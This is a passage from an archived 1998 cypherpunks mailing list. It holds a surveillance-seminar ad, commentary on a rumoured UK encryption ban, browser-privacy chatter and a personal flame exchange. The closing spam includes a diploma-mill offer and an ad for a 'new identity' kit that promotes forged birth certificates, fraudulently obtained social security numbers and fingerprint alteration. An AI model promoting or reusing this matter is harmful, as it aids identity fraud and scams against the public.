tonight -- people can log on from anywhere.  In that spirit, have you
thought any more about a direct and frank conversation by the
President with the country about these allegations?

	MRS. CLINTON: I'm not going to add anything to what the
President has already said.  And I think that any of you who think
hard about this issue would have to agree that he's taken the right
position.  So I'm not going to add to that.

===







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Wed, 11 Feb 1998 15:22:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: SpookTech98]
Message-ID: <34E231DF.28169BB0@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



To: (Recipient list suppressed)
Subject: SpookTech98
From: SpyKing <spyking@thecodex.com>
Date: Sun, 08 Feb 1998 06:26:52 -0500
SpyKing, with a little help from his friends, 
is pleased to announce:

SpookTech98
The Methods of Eavesdropping & Surveillance Seminar II

Live from New York City
Friday, June 5, 1998

Location:

The Crown Plaza at the United Nations  
304 East 42nd Street, New York, NY 10017

Sponsered by the Codex Surveillance & Privacy News, A.L.M.I.E. Association of Legal, Medical & Investigative Experts and W.A.S.P. World Association of Surveillance Professionals. 

If you missed it last year... Don't make the same mistake twice...
You'll meet lots of great people and you'll learn a lot...
                         
In our "Methods of Eavesdropping & Surveillance" Seminar II
you'll learn how various surveillance devices work... and how to protect against them...

You will also learn how the spies among us access confidential information sources and learn everything there is to know about YOU... 


If you're serious about protecting your privacy... you can't afford to miss this seminar... enrollment is VERY limited... 

You will see ACTUAL Demonstrations... 
of the latest Surveillance equipment 
& Investigative techniques...

We will have some vendors this year displaying their wares...
If you are a vendor and would like to exhibit let us know...

You will learn how:

Offices/Homes are bugged
Phones are tapped
Cellular Calls are monitored
People/Vehicles are followed
Computers are eavesdropped on

You will also learn how to PROTECT yourself from these 
surveillance techniques...

We will also give a "live" demonstration of computer data interception...
something everyone who "surfs" the net needs to be aware of...

AND...

We will "crack" a PGP message, show the targets passphrase 
AND the content of the message...

If you're interested in privacy you shouldn't miss SpookTech98!
You do NOT have to be a victim...

You will receive a Wealth of Handout Material...

This is no nonsense information packed seminar 
taught by seasoned professionals 
with a lifetime of surveillance experience in the field... 

You will ALSO Learn How the Spies Among us Obtain:

Non-published telephone numbers
Addresses from Non published numbers
Utility Company information
Health insurance information
Records of Toll calls
Cable company information
Bank Accounts & balances
Cellular Toll records
Pager/Beeper user information

and as an added bonus...

ALL attendees will receive a FREE micro video pinhole camera
and we'll show you HOW to use it to PROTECT your person and/or  assets...

If you're serious about protecting your privacy... you can't afford to miss this seminar... enrollment is VERY limited... 

Seminar Date: Friday, June 5, 1998 Hours: 9:00 AM to 6PM

Location: The Crown Plaza at the United Nations  
304 East 42nd Street, New York, NY 10017


Cost: Advanced Registration SLF & W.A.S.P. Members            $295.00

Non-Members                                             $350.00

Day of Seminar Registration at the Door                 $375.00
(Cash or Money Order Only)


We have created a SpookTech98 powerpoint presentation 
for information purposes 
if anyone would like...
just hit reply and request SpookTech98.ppt

Refreshments will be served ALL day during the seminar including a FREE buffet lunch and SpyKing will host a FREE party for 
all attendees afterwards SOMEWHERE IN NEW YORK CITY...

and I'll pick up the tab again ;-)

Please printout this form and send with reservation. Your reservation will be confirmed to guarantee your seat. Seating is LIMITED.

************************************************************************
 Registration Form

SpookTech98 

************************************************************************

Name:      

Company:

Street Address:

City:

State:

Postal Code:

Country:

E-Mail:

Tel:

Fax:

Amount Enclosed:

***************************************************************************
***************************************************************************

The information supplied in this registration form is STRICTLY confidential
and will NOT be supplied to anyone. 
It is strictly for inhouse registration confirmation.

****************************************************************************
****************************************************************************

Send Registration Form & Payment to:

Codex Publishing
2472 Broadway, Suite 328
New York, New York 10025 USA
917-277-1983

****************************************************************************
****************************************************************************











*************************************************************************
The Codex Surveillance & Privacy News - http://www.thecodex.com
Moderator of "The Surveillance List"... http://www.thecodex.com/list.html
The FIRST & ONLY list dedicated to Surveillance & Investigative Technology...
"We don't spy on you... but we DO keep an eye on those that do..."
************************************************************************* 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Feb 1998 16:16:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: UK Crypto Ban?
Message-ID: <1.5.4.32.19980212001956.00b27e4c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Campaign Against Censorship of the Internet <cacib@liberty.org.uk>
To: ukcrypto@maillist.ox.ac.uk
Date: Tue, 10 Feb 1998 18:18:28 +0100
Subject:  Key escrow announcement


A source who is a lobbyist in a non-computer sector has just called me
to say that Margaret Beckett will be announcing a (compulsory?) key
escrow program next Tuesday.

So far I don't have independent confirmation, although Nigel Hickson
recently said here that he was expecting an announcement "soon".

Here's hoping we can get it out before the gvt machine controls the
spin.

Regards,

Malcolm Hutty.

-----------------------------------------------------------------
Campaign Against Censorship                    Tel: 0171 589 4500
of the Internet in Britain                     Fax: 0171 589 4522
                                     e-mail: cacib@liberty.org.uk
Say NO to Censorship         Web: http://www.liberty.org.uk/cacib

----------

Date: Wed, 11 Feb 1998 23:57:32 +0000
To: ukcrypto@maillist.ox.ac.uk
From: T Bruce Tober <octobersdad@reporters.net>
Subject: More rumours?

-----BEGIN PGP SIGNED MESSAGE-----


Free Life Commentary                    
Editor:  Sean Gabb
Issue Number Ten
Tuesday 10th February 1998, 11:20pm

==========================
"Over himself, over his own mind and body, 
the individual is sovereign"
(J.S. Mill, On Liberty, 1859)
==========================

           Next Week's British Encryption Ban
                      by Sean Gabb

Earlier this evening, I was given confidential information by someone
close to a British Cabinet Minister.  I am not in the habit of speaking
to such people, let alone having them leak state secrets to me.  But
that is what happened.  In publishing what I heard, I am now risking a
prosecution under the Official Secrets Acts - or, more likely, being
made to look ridiculous if what I predict does not happen.  These risks
being accepted, here is the leak.

Next Tuesday, the 17th February 1998, the Department of Trade and
Industry will announce plans to outlaw the use of strong encryption
software within the United Kingdom.  We are to be encouraged - and
ultimately forced - to encrypt our e-mail only in ways that will allow
the authorities to read it.

My source was vague about the details of the scheme, saying that they
had not yet been circulated to the full Cabinet.  But I imagine that it
will be more or less a reprint of the Conservative Government's public
consultation paper of March 1997.  This came to nothing because of the
change of Government, and it was even hoped that Labour would have a
more liberal policy on Internet regulation.  However, Margaret Beckett,
the Minister now responsible for trade and industrial policy, is neither
bright nor forceful; and she was early captured by the officials who in
theory are supposed to do her bidding.  If next Tuesday's consultation
paper differs at all from the last one, it will be only in matters of
small detail and presentation.  For this reason, it is probably safe to
take the last paper as a guide to what we can expect.

The Government will propose creating a network of what are called
Trusted Third Parties, or TTPs.  These are to be organisations licensed
to provide encryption services to the public - that is, software,
consultancy and other support.  Because they have been licensed by the
State, we are to be encouraged to believe that they really are
trustworthy - that they are not distributing bad encryption software, or
robbing their clients in other ways.  But just in case we decide not to
believe any of this, it will be made illegal for any unlicensed person
to offer encryption services.  Here, it is worth quoting from last
year's consultation paper:

    The legislation will prohibit an organisation from offering or
providing encryption services to the UK public without a licence.
Prohibition will be irrespective of whether a charge is made for such
services.  The offering of encryption services to the UK public (for
example via the Internet) by an unlicensed TTP outside of the UK will
also be prohibited.  For this purpose, it may be necessary to place
restrictions on the advertising and marketing of such services to the
public.

Enacted into law, this would make it illegal for me to copy encryption
software from my hard disk for a friend, and for computer magazines to
include it on their free cover disks.  It would also allow a strict
supervision of the material and the links given access to by British
sites on the World Wide Web.

The paper never clarifies why we need TTPs in the first place, or why -
their need granted - they can only be trusted if licensed by the State.
But it does say a lot about law enforcement and national security.  Or,
to be more accurate, it does say a lot in the usual code about the need
to fill in any last potholes on the road to a British police state.

Starting with the Interception of Communications Act 1985, the British
State has given itself powers of surveillance that a Third World
dictator might envy.  It can tap our phones on the word of a Minister.
It can burgle our homes and leave recording devices behind on the word
of a senior policeman.  It can trawl through and inspect any records on
us held by any organisation.  It can do all this without our knowledge,
and without any effective system of appeal and redress.  The relevant
laws are careful to describe the permissions for this as "warrants".
But they really are no more than what in France before the Revolution
were called Lettres du Cachet - things that our ancestors boasted did
not and could not exist in the freer air of England.

The spread of personal computers seemed likely at first to extend the
scope of surveillance still further.  This had until then been limited
by cost.  For all the theoretical risks, sending letters in sealed
envelopes through the post has always been reasonably secure:  the costs
of interception can only be justified in exceptional cases.  For the
same reason, most private papers are safe.  But the routing of an
increasing amount of mail through the Internet promised to bring down
the costs of surveillance to the point where everyone could be watched.
The storage of records on computers connected to the Internet promised
to make it possible for the authorities to spy on people by remote
control.

The problem is the development of strong encryption software like pgp,
and its growing popularity among millions of ordinary people who, though
not criminals, have a strong regard for privacy.  It allows us to keep
our e-mail and private records secret to all but the most determined and
expensive attacks.  It gives to us the benefits of instant communication
and mass data storage, but keeps the authorities - despite their new
powers of surveillance - no better informed than in the old days of due
process and envelope steaming.

Therefore all the talk of Trusted Third Parties.  The terms of their
licences will require them to sell encryption software with keys that
cannot be modified by their clients, and to collect and store copies of
these keys for handing over to the authorities.  Last year's document is
full of promises about "strict safeguards" and the like.  But the
reality is this:

    The legislation will provide that the Secretary of State may issue a
warrant requiring a TTP to disclose private encryption keys... or a body
covered by that warrant.

No mention of judicial involvement at the time, or judicial review
afterwards - just more police state commands.

We can ignore anything the Government parrots next week about law
enforcement and national security - or, for that matter, child
pornography and complex fraud.  These really are just code words.  If I
were a criminal, or a terrorist, or a foreign spy, the last encryption
software I would use would come from a Trusted Third Party.  Strong
encryption packages are available all over the Internet, or can pass
from hand to hand on a single floppy disk.  Nor would I worry much about
laws against the transmission of data encrypted with unlicensed
software.  There are ways of keeping the authorities from even knowing
that an Internet message contains encrypted data.

Somewhere, I have an early version of a program called Steganography,
created by Romana Machado.  This takes an encrypted text and merges it
into a graphics file.  My version produces a visible degradation of
picture quality.  Almost certainly, the newer releases have solved this
problem.  Assuming I had them, and were sufficiently unpatriotic -
neither applies in my case, let me add - I could e-mail this country's
battle plans straight off to Saddam Hussain merged invisibly into a
picture of my dog.  GCHQ would never notice until the Scud missiles
began landing on Cheltenham.

No - the encryption ban will be aimed at us, the honest public.  We are
the people who tend to respect the law - or at least to be afraid of it
enough to comply in most cases.  It is our privacy that is to be
stripped away.  It is we who are to become like Winston Smith, living
for every moment when the telescreens are not monitoring our facial
expressions.

Why this is desired I cannot say.  But we are living though an age of
withering trust in the common people.  In this country, we are not
trusted to possess guns for our self-defence - or indeed to carry carpet
knives locked inside our cars.  We are not trusted to choose and
administer our own medicines, or to bring up our own children in the
manner of our choice, or to decide whether or not oxtail soup might be
bad for us.  Plugging in the telescreens is only a logical next step.

Normally, when I write on these issues, I work myself into a frenzy of
pessimism.  At the moment, though, I feel rather optimistic.  Next
Tuesday's proposals will cause an uproar.  This will not come from the
so-called civil liberties groups like Liberty - excepting a few small
bodies like the Libertarian Alliance, they have all been taken over by
New Labour apparatchiks who can be trusted to keep their mouths shut.
It will come from the big business interests.

British Telecom is the third or fourth largest telecommunications
company in the world.  If operates in more than 40 markets, often
needing to provide its clients with very secure networks.  In the City
of London there are more representative offices of foreign banks than in
the rest of the European Union combined.  These have a taste for
confidentiality.  There are many other large interests - all paying
billions in taxes, all likely to be very hostile to any scheme that will
make them appear less useful to foreign clients.  We have a Labour
Government that still needs to establish itself in the public mind as a
party friendly to business.  These facts can surely be trusted to ensure
the dropping of a scheme that would not merely turn the country into a
full police state, but also do the greatest damage to British business
since nationalisation.

Or so I hope.
==========================
Free Life Commentary is an independent journal of comment, published on
the Internet.  To receive regular issues, send 
e-mail to Sean Gabb at old.whig@virgin.net

Issues are archived at

        <http://freespace.virgin.net/old.whig/>

Contact Address:                        25 Chapter Chambers, 
                                        Esterbrooke Street, 
                                        London, SW1P 4NN; 
                                        Telephone:  0181 858 0841

If you like Free Life Commentary, you may also care to subscribe to my
longer, hard copy journal, Free Life, subscription details for which can
be obtained by writing to me at the above address.

==========================
Legal Notice:  Though using the name Free Life, this journal is owned by
me and not by the Libertarian Alliance, which in consequence bears no
liability of whatever kind for the contents.
- -- 
Sean Gabb                               | "Over himself, over his own  |
E-mail:  old.whig@virgin.net            | mind and body, the individual| 
<http://freespace.virgin.net/old.whig/> | is sovereign"                |
Mobile Number: 0956 472199              | J.S. Mill, On Liberty, 1859  |

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNOI4cDzmzFmU9IJVAQFOFAQAlLgKRAM6wTztCSVvUAAUY/g8k0iOKCGY
4s8O7c+axQUcf3e3RTxKbIPqoIeb81uIcKwv86havRuUsm2r2OHADuRBlWT7VgrR
RKKCuuvrF19G4/hLTn7094NqUvnp5LAZpKOX7ITYQC/grQL8gnkd/xvpj55Z9oek
idz0EU18xJo=
=cNRU
-----END PGP SIGNATURE-----



tbt -- 
-- 
|Bruce Tober, octobersdad@reporters.net, Birmingham, England +44-121-242-3832|
|       Freelance PhotoJournalist - IT, Business, The Arts and lots more     |
|pgp key ID 0x94F48255. Website - http://www.homeusers.prestel.co.uk/crecon/ |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infonex.com>
Date: Wed, 11 Feb 1998 20:05:19 -0800 (PST)
To: Information Security <guy@panix.com>
Subject: Re: www.lanl.gov
In-Reply-To: <199802120233.VAA17969@panix2.panix.com>
Message-ID: <v03130300b1082440e0fc@[209.75.197.30]>
MIME-Version: 1.0
Content-Type: text/plain


I hope you'll endure a product endorsement.. use Anonymizer Surfing
when trolling for "sensitive" information on web sites you don't trust.
Stops Java, Javascript, and cookies, hides your IP address, etc.

Free trial available with delay; $5 per month in quarters eliminates
the free trial delay. Yes, it's still sometimes slower, because the
traffic travels further, but now it's sitting on a pretty reliable
ATM network with decent connectivity.

Mark Hedges
Anonymizer, Inc.


>Two minutes after that, my computer dialed up my ISP and
>connected to the Net again: it was the LANL page.
>
>I hit 'STOP', and the connection timed out again, and that was that.
>
>I hate the way there isn't some choice about allowing (JAVA?)
>to NOT do that unless expressly allowed.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 11 Feb 1998 20:38:32 -0800 (PST)
To: Mark Hedges <hedges@infonex.com>
Subject: Specious use of specie?
In-Reply-To: <199802120233.VAA17969@panix2.panix.com>
Message-ID: <v03102802b1082d48180b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:05 PM -0800 2/11/98, Mark Hedges wrote:

>Free trial available with delay; $5 per month in quarters eliminates

Hey, the _postage_ on mailing 20 quarters every month will get to be a
headache.

Can't you accept dollar bills? Or a check?

--Tim May


Voluntary Mandatory Self-Rating of this Article
(U.S. Statute 43-666-970719).
Warning: Failure to Correctly and Completely Label any Article or Utterance
is a Felony under the "Children's Internet Safety Act of 1997," punishable
by 6 months for the first offense, two years for each additional offense,
and a $100,000 fine per offense. Reminder: The PICS/RSACi label must itself
not contain material in violation of the Act.

** PICS/RSACi Voluntary Self-Rating (Text Form) ** :

Suitable for Children: yes  Age Rating: 5 years and up.
Suitable for Christians: No Suitable for Moslems: No  Hindus: Yes
Pacifists: No  Government Officials: No  Nihilists: Yes  Anarchists: Yes
Vegetarians: Yes  Vegans: No  Homosexuals: No  Atheists: Yes
Caucasoids: Yes  Negroids: No  Mongoloids: Yes
Bipolar Disorder: No  MPD: Yes and No  Attention Deficit Disorder:Huh?

--Contains discussions of sexuality, rebellion, anarchy, chaos,torture,
regicide, presicide, suicide, aptical foddering.
--Contains references hurtful to persons of poundage and people of
color.Sensitive persons are advised to skip this article.

**SUMMARY**
Estimated number of readers qualified to read this: 1
Composite Age Rating: 45 years






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 11 Feb 1998 20:44:39 -0800 (PST)
To: Information Security <cypherpunks@toad.com
Subject: Re: www.lanl.gov
In-Reply-To: <199802120233.VAA17969@panix2.panix.com>
Message-ID: <v03102803b1082e3f51dd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:33 PM -0800 2/11/98, Information Security wrote:

>I pulled up www.lanl.gov (for whatever reason), flipped back to
>my ISP shell account, did some stuff, logged out.
>
>Five minutes later, my PPP connection timed out, and so
>the line dropped.
>
>Two minutes after that, my computer dialed up my ISP and
>connected to the Net again: it was the LANL page.
>
>I hit 'STOP', and the connection timed out again, and that was that.
>
>I hate the way there isn't some choice about allowing (JAVA?)
>to NOT do that unless expressly allowed.
>
>I wonder what LANL loaded into my system that needed Net connectivity
>after seven minutes???

Perhaps LANL felt it needed to analyze what was on your computer? To see if
you were an Iraqi or Albanian or Quebecois spy attempting to learn atomic
secrets?

(LANL for those of you mysitified by this is Los Alamos National
Laboratory, of course. A beautiful place, high in the Jemez mountains of
New Mexico. As nuclear weapons work has been declinining, they've been
casting about for a new mission to justify government pork being sent their
way. One of their new interests is in hacking, intrusion, and "open
sources.")

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Feb 1998 18:27:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Me & Louis Freeh
In-Reply-To: <v03007801b1080552aa0f@[168.161.105.216]>
Message-ID: <PRNRke6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh <declan@well.com> writes:

> Just got mail --
>
> >Have some friends in the FBI and I just thought that you would like to
> >know that Louis Freeh personally considers you, and I quote, and
> >"radical".  Amazing, isn't it?
> >
> >Just thought you would like to know what the great Louis Freeh thinks of
> >you...
>
> Somehow I get the impression that FBI directors don't like "radicals" much...

I don't like people who forge quotes from me in their netly news "exposes",
as Declan has done.

Center for Democracy in Technology doesn't like Declan either - they've even
complained to Declan's editors at Time Warner about his lies and fabrications.

What does it mean when the Vulis, CDT, and the FBI all agree?

P.S. Declan, are you an alcoholic?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 11 Feb 1998 18:33:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: www.lanl.gov
Message-ID: <199802120233.VAA17969@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Bleep!

I pulled up www.lanl.gov (for whatever reason), flipped back to
my ISP shell account, did some stuff, logged out.

Five minutes later, my PPP connection timed out, and so
the line dropped.

Two minutes after that, my computer dialed up my ISP and
connected to the Net again: it was the LANL page.

I hit 'STOP', and the connection timed out again, and that was that.

I hate the way there isn't some choice about allowing (JAVA?)
to NOT do that unless expressly allowed.

I wonder what LANL loaded into my system that needed Net connectivity
after seven minutes???

---guy

   Vulgersauris is a shadow of his former self.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 11 Feb 1998 18:56:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Me & Louis Freeh
Message-ID: <199802120256.VAA19033@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   To: cypherpunks@toad.com
   >   Subject: Re: Me & Louis Freeh
   >   From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)

   >   I don't like people who forge quotes from me in their netly news "exposes",
   >   as Declan has done.

Huh?

   >   What does it mean when the Vulis, CDT, and the FBI all agree?

Didn't happen.

   >   Declan, are you an alcoholic?

No, he's a free radical.
---guy

   h'yuk h'yuk h'yuk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Feb 1998 20:56:18 -0800 (PST)
To: guy@panix.com (Information Security)
Subject: Re: www.lanl.gov
In-Reply-To: <199802120412.XAA24363@panix2.panix.com>
Message-ID: <199802120453.WAA30761@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Information Security wrote:
>    >   From hedges@infonex.com Wed Feb 11 23:05:14 1998
>    >   I hope you'll endure a product endorsement.. use Anonymizer Surfing
>    >   when trolling for "sensitive" information on web sites you don't trust.
>    >   Stops Java, Javascript, and cookies, hides your IP address, etc.
> 
> I don't trust any sites.
> 

Try using crowds.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 11 Feb 1998 20:08:27 -0800 (PST)
To: Information Security <guy@panix.com>
Subject: Re: Me & Louis Freeh
In-Reply-To: <199802120256.VAA19033@panix2.panix.com>
Message-ID: <v03007800b10823dff190@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain


Geez, I was wondering why I hadn't heard anything from Vulis in so long.
Forgot I killfiled him half a year ago.

Now I remember why.

-Declan

At 21:56 -0500 2/11/98, Information Security wrote:
>   >   To: cypherpunks@toad.com
>   >   Subject: Re: Me & Louis Freeh
>   >   From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>
>   >   I don't like people who forge quotes from me in their netly news
>"exposes",
>   >   as Declan has done.
>
>Huh?
>
>   >   What does it mean when the Vulis, CDT, and the FBI all agree?
>
>Didn't happen.
>
>   >   Declan, are you an alcoholic?
>
>No, he's a free radical.
>---guy
>
>   h'yuk h'yuk h'yuk







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 11 Feb 1998 20:12:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: www.lanl.gov
Message-ID: <199802120412.XAA24363@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From hedges@infonex.com Wed Feb 11 23:05:14 1998
   >   
   >   I hope you'll endure a product endorsement.. use Anonymizer Surfing
   >   when trolling for "sensitive" information on web sites you don't trust.
   >   Stops Java, Javascript, and cookies, hides your IP address, etc.

I don't trust any sites.

And, I hear the anonymizer blocks some highly useful sites like
DejaNews, which would have been a handy way to post anonymously.

And I can turn off Java and cookies.

What I really should do is take the time to
run Netscape under 'chroot'.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Feb 1998 15:38:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: PGP 5.5 BS upgrade
Message-ID: <199802112338.AAA16726@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone got the upgrade/bugfix for PGP 5.5 Business Security?  I think it's
5.5.2 (?)  I'm looking for the Win platform upgrade if anyone can help. 
Perhaps someone could upload it to a c'punk FTP site or post the URL.

Thanks in advance!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 57163566@compuserve.com
Date: Thu, 12 Feb 1998 15:54:17 -0800 (PST)
To: urn@piegytt.com
Subject: You Also Have Rights!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Are you tired of being underpaid for your hard 
work?

Do you want the admiration of your friends, relatives, 
and loved ones?

Are you seeking recognition as an accomplished and 
valued individual?

If your answer is "Yes" to any of these questions, you 
need a diploma from a higher university.

Obtain bachelors, masters, and PhD diplomas from 
prestigious non-accredited universities for as little as $125.  

The only requirement is a brief interview by phone. 

Your diploma will be decorating your wall within hours.

For details call 1-773-506-4509.

When you call, after the message, at the tone, talk 
slowly and clearly and:

1) Say that you are interested in the University 
Diploma Program.

2)  Say your name, then spell your last name.

3)  Leave your daytime and nighttime phone 
numbers including area codes.

4)  Repeat these two phone numbers.

NOTE:  Leave phone numbers that you personally 
answer.  Do NOT leave pager, beeper, or voice 
mail numbers.  

/////////////////////////////////////////////////////
The above message was brought to you by PlusNet 
Marketing & Distributors.  We market or distribute any 
product or service by bulk E-mail and by traditional 
marketing media.  For information, call 1-513-763-3862.
/////////////////////////////////////////////////////





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tihu@wvz.net
Date: Wed, 11 Feb 1998 18:37:15 -0800 (PST)
To: tihu@wvz.net
Subject: U.S. Income Tax Returns - $199 (Feb 28th deadline)
Message-ID: <19980210405OAA38218@post.fr>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
<html>

<head>
  <title>INCOME TAX SPECIAL</title>
</head>

<body>

<center>
INCOME TAX SPECIAL! - $199
<p>
Any State and Federal Income Tax Return
<p>
Offer Expires Febuary 28th!
<p>
<A HREF="http://www.actun.com/cpa">Click Here to take your Income Tax
Return headaches away!</A>
<p>
<blockquote>
C.P.A.-
-over 18 years experience
-Masters Degree in Science and Taxation
</blockquote>

</body>

</html>


</FONT><FONT  COLOR="#000000" SIZE=3>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@bulkemailserver.com
Date: Thu, 12 Feb 1998 07:26:39 -0800 (PST)
To: Friend@public.com
Subject: Do you need a NEW IDENTITY?
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Do you need a NEW IDENTITY/NEW ID/CREDIT/PROTECTION/PRIVACY/WEALTH?

LEAVE YOUR PAST BEHIND, FOR WHATEVER REASON!
GET AWAY FROM ABUSIVE SPOUSES...FOREVER.  START A NEW LIFE.

We can help!  All of the above is in the LIFE ENHANCEMENT KIT.

The LIFE ENHANCEMENT KIT is a COMPLETE, easy step by step do it yourself
kit.  There is nothing like it on the market today!  The kit contains compiled information
from many different sources.  In fact, it contains 4 LBS. of easy to use, up-to-date
life enhancement information!!!  For those of you that would like help,
***INFORMATION ON PAYING SOMEONE TO CREATE A TOTAL NEW
IDENTITY FOR YOU is located directly after the ordering information for the 
"Life Enhancement Kit."

YOU'LL LEARN:

1.  How to DISAPPEAR FOR GOOD.  Perfectly, for whatever reasons.
2.  How to create an identity out of thin air and make it work.
3.  Make the government itself create your new identity!
4.  How to get genuine id.
5.  How to obtain any type of supportive card you need.
6.  Changing citizenship from one country to another.
7.  How to get id in your new name - LEGALLY, without going to court.
8.  Inside secrets of fingerprinting, faking, altering, removing, YES it CAN be done!
9.  A step by step method of assembling a complete package of ALTERNATE ID, based on an original birth certificate.
10. Professional methods used before only by the top espionage agents - now for YOU to use.
11. YOU'LL LEARN HOW TO CREATE A TOTALLY NEW IDENTITY
(more than 10 different ways) with every supportive document you'll need.
12. You can KEEP YOUR PRESENT IDENTITY & HAVE A 2ND IDENTITY WITHOUT THEIR
PATHS CROSSING.  Or if you choose, the present you can "die" and use only the "NEW" YOU.

BEWARE, this is not that "simple"  new id bought through the mail that your teeenage brother
uses to impress his friends.  This is REAL! Seals, stamps, etc. EVERYTHING!

You'll also learn HOW TO CREATE A NEW BIRTH CERTIFICATE and make it look
authentic with a genuine hospital seal and rubber stamp, and "age" it in the oven.

Seeing is believing, folks...

You'll even find out which social security offices in every state to take your new "created"
birth certificate to get a NEW SOCIAL SECURITY NUMBER AND CARD!  You'll find out
what other EASY TO OBTAIN documentation you'll need to take with you.  You'll even learn
what to say to the social security employees.

HURRY!  Get your new identity started now, you never know when a situation will arrive
that will cause you to need it.  BE READY!  The government is making it harder to create
identities each year, the harder it gets, the more money it's going to cost you and the more
time it will take.  GET IT NOW.  It's also a GREAT GIFT for your FRIEND OR FAMILY
who's having a hard time financially or is an abusive relationship!

***SPECIAL!!!  ALL OF THE ABOVE is contained in 5 EASY TO READ, STEP BY STEP
Books.  THE 5 BOOKS PLUS ALL OF THE FOLLOWING IS INCLUDED IN YOUR
"LIFE ENHANCEMENT KIT" FOR ONE LOW PRICE, if you order now!

CREDIT... We all need it.  How to get it, no matter what your credit file looks like now.
You will need this information to go with your NEW identity!  A NEW IDENTITY IS 
ALMOST USELESS WITHOUT ESTABLISHING CREDIT.

YOU'LL LEARN:

1.  How NEW files are created with NEW names.
2.  Banks with lowest interest rates.
3.  Cards with no annual fees.
4.  How to get UNSECURED credit NOW (INCLUDING VISA) even with bad
credit or no credit, addresses/phone numbers included.
5.  What credit cards are easiest to get.
6.  How to get a car loan or home loan with bad or little credit.  Yes, you too can have those things
regardless of what your credit reports say now.
7.  How to clear bad credit and ESTABLISH NEW CREDIT.
8.  How to find out what's on your credit file.
9.  What bankers look for on a loan application.
10. How to build a credit line of $100,000.00 OR MORE!  It's YOUR turn now.

GET ON WITH YOUR LIFE, this information will show you how.  YOU DON'T
HAVE TO KEEP PAYING FOR YOUR MISTAKES FOR THE NEXT 7-10 YEARS!

Also included in the LIFE ENHANCEMENT KIT IS:

1.  How to get a LEGITIMATE travel agent id card in any name you choose.
Use this card for HUGE DISCOUNTS, up to 90% and sometimes free, on
air fare, car rentals, hotels, cruises, amusement theme parks, ALL OVER THE WORLD!

2.  How to LEGALLY REDUCE your INCOME TAXES with an International Business
Corporation (IBC) and with an onshore corporation.  PLUS find out the MANY OTHER
BENEFITS these "legal people" can do for you  INCLUDING INTERNATIONAL
PROFITABLE WEALTH BUILDING BUSINESS OPPORTUNITIES, THAT ARE NOT
ADVERTISED IN THE USA.  These ARE NOT MLM.  You DO NOT NEED TO
RECRUIT ANYONE!

3.  Find out who can teach you how to KEEP YOUR FINANCIAL AFFAIRS PRIVATE...
MAINTAIN A LOW PROFILE... AND HOW TO HIDE IN PLAIN SIGHT!  How to keep 
most of your wealth, protect your assets and how to organize your affairs to result
in the lowest possible tax liability!  You can also find out how to LAWSUILT PROOF
YOURSELF!  Guaranteed to send a gold digger packing with his tail between his legs!

4.  Where to get information on how to LEGALLY FILE A $0.00 INCOME TAX RETURN
